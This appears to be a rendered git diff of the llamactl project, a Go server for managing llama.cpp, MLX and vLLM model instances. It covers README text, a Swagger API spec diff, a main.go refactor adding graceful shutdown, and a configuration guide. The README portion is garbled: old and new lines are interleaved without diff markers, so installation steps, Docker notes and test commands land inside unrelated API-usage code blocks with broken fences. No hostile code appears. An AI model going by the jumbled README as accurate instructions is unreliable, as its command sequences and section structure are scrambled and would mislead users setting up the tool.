llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
1. Hardcoded defaults
2. Configuration file
3. Environment variables
### Configuration Files
Configuration files are searched in the following locations:
**Linux/macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `~/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable
## API Key Authentication
llamactl now supports API Key authentication for both management and inference (OpenAI-compatible) endpoints. The are separate keys for management and inference APIs. Management keys grant full access; inference keys grant access to OpenAI-compatible endpoints
**How to Use:**
- Pass your API key in requests using one of:
- `Authorization: Bearer <key>` header
- `X-API-Key: <key>` header
- `api_key=<key>` query parameter
**Auto-generated keys**: If no keys are set and authentication is required, a key will be generated and printed to the terminal at startup. For production, set your own keys in config or environment variables.
### Configuration Options
#### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
#### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances
log_directory: "/tmp/llamactl" # Directory for instance logs
max_instances: -1 # Maximum instances (-1 = unlimited)
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_LOG_DIR` - Log directory path
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
#### Auth Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
### Example Configuration
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8001, 8100]
log_directory: "/var/log/llamactl"
max_instances: 10
llama_executable: "/usr/local/bin/llama-server"
default_auto_restart: true
default_max_restarts: 5
default_restart_delay: 10
auth:
require_inference_auth: true
inference_keys: ["sk-inference-abc123"]
require_management_auth: true
management_keys: ["sk-management-xyz456"]
# 3. Start the server
llamactl
# Access dashboard at http://localhost:8080
```
## Usage
### Starting the Server
### Create and manage instances via web dashboard:
1. Open http://localhost:8080
2. Click "Create Instance"
3. Choose backend type (llama.cpp, MLX, or vLLM)
4. Set model path and backend-specific options
5. Configure environment variables if needed (optional)
6. Start or stop the instance
### Or use the REST API:
```bash
# Start with default configuration
./llamactl
# Create llama.cpp instance
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "llama_cpp", "backend_options": {"model": "/path/to/model.gguf", "gpu_layers": 32}}'
# Start with custom config file
LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl
# Create MLX instance (macOS)
curl -X POST localhost:8080/api/v1/instances/my-mlx-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "mlx_lm", "backend_options": {"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit"}}'
# Start with environment variables
LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
# Create vLLM instance with environment variables
curl -X POST localhost:8080/api/v1/instances/my-vllm-model \
-H "Authorization: Bearer your-key" \
-d '{"backend_type": "vllm", "backend_options": {"model": "microsoft/DialoGPT-medium", "tensor_parallel_size": 2}, "environment": {"CUDA_VISIBLE_DEVICES": "0,1", "NCCL_DEBUG": "INFO"}}'
# Use with OpenAI SDK
curl -X POST localhost:8080/v1/chat/completions \
-H "Authorization: Bearer your-key" \
-d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
```
### Web Dashboard
## Installation
Open your browser and navigate to `http://localhost:8080` to access the web dashboard.
### API Usage
The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.
#### Create an Instance
### Option 1: Download Binary (Recommended)
```bash
curl -X POST http://localhost:8080/api/v1/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"model": "/path/to/model.gguf",
"gpu_layers": 32,
"auto_restart": true
}'
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from the releases page:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
#### List Instances
### Option 2: Build from Source
Requires Go 1.24+ and Node.js 22+
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
cd webui && npm ci && npm run build && cd ..
go build -o llamactl ./cmd/server
```
## Prerequisites
### Backend Dependencies
**For llama.cpp backend:**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
curl http://localhost:8080/api/v1/instances
# Homebrew (macOS)
brew install llama.cpp
# Or build from source - see llama.cpp docs
# Or use Docker - no local installation required
```
#### Start/Stop Instance
**For MLX backend (macOS only):**
You need MLX-LM installed:
```bash
# Start
curl -X POST http://localhost:8080/api/v1/instances/my-instance/start
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Stop
curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
### OpenAI Compatible Endpoints
Route requests to instances by including the instance name as the model parameter:
**For vLLM backend:**
You need vLLM installed:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-instance",
"messages": [{"role": "user", "content": "Hello!"}]
}'
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# Or use Docker - no local installation required
```
## Development
## Docker Support
### Running Tests
llamactl supports running backends in Docker containers - perfect for production deployments without local backend installation. Simply enable Docker in your configuration:
```bash
# Go tests
go test ./...
# Web UI tests
cd webui
npm test
```yaml
backends:
llama-cpp:
docker:
enabled: true
vllm:
docker:
enabled: true
```
### Development Server
**Requirements:** Docker installed and running. For GPU support: nvidia-docker2 (Linux) or Docker Desktop with GPU support.
```bash
# Start Go server in development mode
go run ./cmd/server
For detailed Docker configuration options, see the [Configuration Guide](docs/getting-started/configuration.md).
# Start web UI development server (in another terminal)
cd webui
npm run dev
## Configuration
llamactl works out of the box with sensible defaults.
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {} # Environment variables for the container
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {} # Environment variables for the container
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## API Documentation
Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
For detailed configuration options including environment variables, file locations, and advanced settings, see the [Configuration Guide](docs/getting-started/configuration.md).
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
MIT License - see [LICENSE](LICENSE) file.

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@@ -1,362 +1,60 @@
basePath: /api/v1
definitions:
llamactl.CreateInstanceOptions:
backends.BackendType:
enum:
- llama_cpp
- mlx_lm
- vllm
type: string
x-enum-varnames:
- BackendTypeLlamaCpp
- BackendTypeMlxLm
- BackendTypeVllm
instance.CreateInstanceOptions:
properties:
alias:
type: string
api_key:
type: string
api_key_file:
type: string
auto_restart:
description: Auto restart
type: boolean
batch_size:
type: integer
cache_reuse:
type: integer
cache_type_k:
type: string
cache_type_k_draft:
type: string
cache_type_v:
type: string
cache_type_v_draft:
type: string
chat_template:
type: string
chat_template_file:
type: string
chat_template_kwargs:
type: string
check_tensors:
type: boolean
cont_batching:
type: boolean
control_vector:
items:
type: string
type: array
control_vector_layer_range:
type: string
control_vector_scaled:
items:
type: string
type: array
cpu_mask:
type: string
cpu_mask_batch:
type: string
cpu_range:
type: string
cpu_range_batch:
type: string
cpu_strict:
type: integer
cpu_strict_batch:
type: integer
ctx_size:
type: integer
ctx_size_draft:
type: integer
defrag_thold:
type: number
device:
type: string
device_draft:
type: string
draft_max:
description: Speculative decoding params
type: integer
draft_min:
type: integer
draft_p_min:
type: number
dry_allowed_length:
type: integer
dry_base:
type: number
dry_multiplier:
type: number
dry_penalty_last_n:
type: integer
dry_sequence_breaker:
items:
type: string
type: array
dump_kv_cache:
type: boolean
dynatemp_exp:
type: number
dynatemp_range:
type: number
embd_bge_small_en_default:
description: Default model params
type: boolean
embd_e5_small_en_default:
type: boolean
embd_gte_small_default:
type: boolean
embedding:
type: boolean
escape:
type: boolean
fim_qwen_1_5b_default:
type: boolean
fim_qwen_3b_default:
type: boolean
fim_qwen_7b_default:
type: boolean
fim_qwen_7b_spec:
type: boolean
fim_qwen_14b_spec:
type: boolean
flash_attn:
type: boolean
frequency_penalty:
type: number
gpu_layers:
type: integer
gpu_layers_draft:
type: integer
grammar:
type: string
grammar_file:
type: string
hf_file:
type: string
hf_file_v:
type: string
hf_repo:
type: string
hf_repo_draft:
type: string
hf_repo_v:
type: string
hf_token:
type: string
host:
type: string
ignore_eos:
type: boolean
jinja:
type: boolean
json_schema:
type: string
json_schema_file:
type: string
keep:
type: integer
log_colors:
type: boolean
log_disable:
type: boolean
log_file:
type: string
log_prefix:
type: boolean
log_timestamps:
type: boolean
logit_bias:
items:
type: string
type: array
lora:
items:
type: string
type: array
lora_init_without_apply:
type: boolean
lora_scaled:
items:
type: string
type: array
main_gpu:
backend_options:
additionalProperties: {}
type: object
backend_type:
$ref: '#/definitions/backends.BackendType'
idle_timeout:
description: Idle timeout
type: integer
max_restarts:
type: integer
metrics:
on_demand_start:
description: On demand start
type: boolean
min_p:
type: number
mirostat:
type: integer
mirostat_ent:
type: number
mirostat_lr:
type: number
mlock:
type: boolean
mmproj:
type: string
mmproj_url:
type: string
model:
type: string
model_draft:
type: string
model_url:
type: string
model_vocoder:
description: Audio/TTS params
type: string
no_cont_batching:
type: boolean
no_context_shift:
description: Server/Example-specific params
type: boolean
no_escape:
type: boolean
no_kv_offload:
type: boolean
no_mmap:
type: boolean
no_mmproj:
type: boolean
no_mmproj_offload:
type: boolean
no_perf:
type: boolean
no_prefill_assistant:
type: boolean
no_slots:
type: boolean
no_warmup:
type: boolean
no_webui:
type: boolean
numa:
type: string
override_kv:
items:
type: string
type: array
override_tensor:
items:
type: string
type: array
parallel:
type: integer
path:
type: string
poll:
type: integer
poll_batch:
type: integer
pooling:
type: string
port:
type: integer
predict:
type: integer
presence_penalty:
type: number
priority:
type: integer
priority_batch:
type: integer
props:
type: boolean
reasoning_budget:
type: integer
reasoning_format:
type: string
repeat_last_n:
type: integer
repeat_penalty:
type: number
reranking:
type: boolean
restart_delay_seconds:
description: RestartDelay duration in seconds
type: integer
rope_freq_base:
type: number
rope_freq_scale:
type: number
rope_scale:
type: number
rope_scaling:
type: string
samplers:
description: Sampling params
type: string
sampling_seq:
type: string
seed:
type: integer
slot_prompt_similarity:
type: number
slot_save_path:
type: string
slots:
type: boolean
special:
type: boolean
split_mode:
type: string
spm_infill:
type: boolean
ssl_cert_file:
type: string
ssl_key_file:
type: string
temperature:
type: number
tensor_split:
type: string
threads:
type: integer
threads_batch:
type: integer
threads_http:
type: integer
timeout:
type: integer
top_k:
type: integer
top_p:
type: number
tts_use_guide_tokens:
type: boolean
typical:
type: number
ubatch_size:
type: integer
verbose:
type: boolean
verbose_prompt:
description: Common params
type: boolean
verbosity:
type: integer
xtc_probability:
type: number
xtc_threshold:
type: number
yarn_attn_factor:
type: number
yarn_beta_fast:
type: number
yarn_beta_slow:
type: number
yarn_ext_factor:
type: number
yarn_orig_ctx:
restart_delay:
description: seconds
type: integer
type: object
llamactl.Instance:
instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process:
properties:
created:
description: Creation time
type: integer
name:
type: string
running:
status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status
type: boolean
type: object
llamactl.OpenAIInstance:
server.OpenAIInstance:
properties:
created:
type: integer
@@ -367,15 +65,20 @@ definitions:
owned_by:
type: string
type: object
llamactl.OpenAIListInstancesResponse:
server.OpenAIListInstancesResponse:
properties:
data:
items:
$ref: '#/definitions/llamactl.OpenAIInstance'
$ref: '#/definitions/server.OpenAIInstance'
type: array
object:
type: string
type: object
server.ParseCommandRequest:
properties:
command:
type: string
type: object
info:
contact: {}
description: llamactl is a control server for managing Llama Server instances.
@@ -385,6 +88,153 @@ info:
title: llamactl API
version: "1.0"
paths:
/backends/llama-cpp/devices:
get:
description: Returns a list of available devices for the llama server
responses:
"200":
description: List of devices
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- backends
/backends/llama-cpp/help:
get:
description: Returns the help text for the llama server command
responses:
"200":
description: Help text
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- backends
/backends/llama-cpp/parse-command:
post:
consumes:
- application/json
description: Parses a llama-server command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
"500":
description: Internal Server Error
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse llama-server command
tags:
- backends
/backends/llama-cpp/version:
get:
description: Returns the version of the llama server command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- backends
/backends/mlx/parse-command:
post:
consumes:
- application/json
description: Parses MLX-LM server command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse mlx_lm.server command
tags:
- backends
/backends/vllm/parse-command:
post:
consumes:
- application/json
description: Parses a vLLM serve command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse vllm serve command
tags:
- backends
/instances:
get:
description: Returns a list of all instances managed by the server
@@ -393,7 +243,7 @@ paths:
description: List of instances
schema:
items:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
type: array
"500":
description: Internal Server Error
@@ -441,7 +291,7 @@ paths:
"200":
description: Instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -470,12 +320,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions'
$ref: '#/definitions/instance.CreateInstanceOptions'
responses:
"201":
description: Created instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid request body
schema:
@@ -504,12 +354,12 @@ paths:
name: options
required: true
schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions'
$ref: '#/definitions/instance.CreateInstanceOptions'
responses:
"200":
description: Updated instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -627,7 +477,7 @@ paths:
"200":
description: Restarted instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -654,7 +504,7 @@ paths:
"200":
description: Started instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -681,7 +531,7 @@ paths:
"200":
description: Stopped instance details
schema:
$ref: '#/definitions/llamactl.Instance'
$ref: '#/definitions/instance.Process'
"400":
description: Invalid name format
schema:
@@ -695,57 +545,6 @@ paths:
summary: Stop a running instance
tags:
- instances
/server/devices:
get:
description: Returns a list of available devices for the llama server
responses:
"200":
description: List of devices
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- server
/server/help:
get:
description: Returns the help text for the llama server command
responses:
"200":
description: Help text
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- server
/server/version:
get:
description: Returns the version of the llama server command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- server
/v1/:
post:
consumes:
@@ -757,7 +556,7 @@ paths:
"200":
description: OpenAI response
"400":
description: Invalid request body or model name
description: Invalid request body or instance name
schema:
type: string
"500":
@@ -777,7 +576,7 @@ paths:
"200":
description: List of OpenAI-compatible instances
schema:
$ref: '#/definitions/llamactl.OpenAIListInstancesResponse'
$ref: '#/definitions/server.OpenAIListInstancesResponse'
"500":
description: Internal Server Error
schema:
@@ -787,4 +586,21 @@ paths:
summary: List instances in OpenAI-compatible format
tags:
- openai
/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- version
swagger: "2.0"

View File

@@ -2,11 +2,20 @@ package main
import (
"fmt"
llamactl "llamactl/pkg"
"llamactl/pkg/config"
"llamactl/pkg/manager"
"llamactl/pkg/server"
"net/http"
"os"
"os/signal"
"syscall"
)
// version is set at build time using -ldflags "-X main.version=1.0.0"
var version string = "unknown"
var commitHash string = "unknown"
var buildTime string = "unknown"
// @title llamactl API
// @version 1.0
// @description llamactl is a control server for managing Llama Server instances.
@@ -15,29 +24,76 @@ import (
// @basePath /api/v1
func main() {
config, err := llamactl.LoadConfig("")
// --version flag to print the version
if len(os.Args) > 1 && os.Args[1] == "--version" {
fmt.Printf("llamactl version: %s\n", version)
fmt.Printf("Commit hash: %s\n", commitHash)
fmt.Printf("Build time: %s\n", buildTime)
return
}
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
cfg, err := config.LoadConfig(configPath)
if err != nil {
fmt.Printf("Error loading config: %v\n", err)
fmt.Println("Using default configuration.")
}
// Create the log directory if it doesn't exist
err = os.MkdirAll(config.Instances.LogDirectory, 0755)
if err != nil {
fmt.Printf("Error creating log directory: %v\n", err)
return
// Set version information
cfg.Version = version
cfg.CommitHash = commitHash
cfg.BuildTime = buildTime
// Create the data directory if it doesn't exist
if cfg.Instances.AutoCreateDirs {
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
fmt.Println("Persistence will not be available.")
}
if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
fmt.Println("Instance logs will not be available.")
}
}
// Initialize the instance manager
instanceManager := llamactl.NewInstanceManager(config.Instances)
instanceManager := manager.NewInstanceManager(cfg.Backends, cfg.Instances)
// Create a new handler with the instance manager
handler := llamactl.NewHandler(instanceManager, config)
handler := server.NewHandler(instanceManager, cfg)
// Setup the router with the handler
r := llamactl.SetupRouter(handler)
r := server.SetupRouter(handler)
// Start the server with the router
fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port)
http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r)
// Handle graceful shutdown
stop := make(chan os.Signal, 1)
signal.Notify(stop, os.Interrupt, syscall.SIGTERM)
server := http.Server{
Addr: fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
Handler: r,
}
go func() {
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
fmt.Printf("Error starting server: %v\n", err)
}
}()
// Wait for shutdown signal
<-stop
fmt.Println("Shutting down server...")
if err := server.Close(); err != nil {
fmt.Printf("Error shutting down server: %v\n", err)
} else {
fmt.Println("Server shut down gracefully.")
}
// Wait for all instances to stop
instanceManager.Shutdown()
fmt.Println("Exiting llamactl.")
}

5
docs-requirements.txt Normal file
View File

@@ -0,0 +1,5 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4
mike==2.0.0

View File

@@ -0,0 +1,238 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
## Configuration Options
### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Backend Configuration
```yaml
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false # Enable Docker runtime (default: false)
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
# MLX does not support Docker
```
**Backend Configuration Fields:**
- `command`: Executable name/path for the backend
- `args`: Default arguments prepended to all instances
- `environment`: Environment variables for the backend process (optional)
- `docker`: Docker-specific configuration (optional)
- `enabled`: Boolean flag to enable Docker runtime
- `image`: Docker image to use
- `args`: Additional arguments passed to `docker run`
- `environment`: Environment variables for the container (optional)
**Environment Variables:**
**LlamaCpp Backend:**
- `LLAMACTL_LLAMACPP_COMMAND` - LlamaCpp executable command
- `LLAMACTL_LLAMACPP_ARGS` - Space-separated default arguments
- `LLAMACTL_LLAMACPP_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_LLAMACPP_DOCKER_ENABLED` - Enable Docker runtime (true/false)
- `LLAMACTL_LLAMACPP_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_LLAMACPP_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_LLAMACPP_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
**VLLM Backend:**
- `LLAMACTL_VLLM_COMMAND` - VLLM executable command
- `LLAMACTL_VLLM_ARGS` - Space-separated default arguments
- `LLAMACTL_VLLM_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_VLLM_DOCKER_ENABLED` - Enable Docker runtime (true/false)
- `LLAMACTL_VLLM_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_VLLM_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_VLLM_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
**MLX Backend:**
- `LLAMACTL_MLX_COMMAND` - MLX executable command
- `LLAMACTL_MLX_ARGS` - Space-separated default arguments
- `LLAMACTL_MLX_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
max_running_instances: -1 # Maximum running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
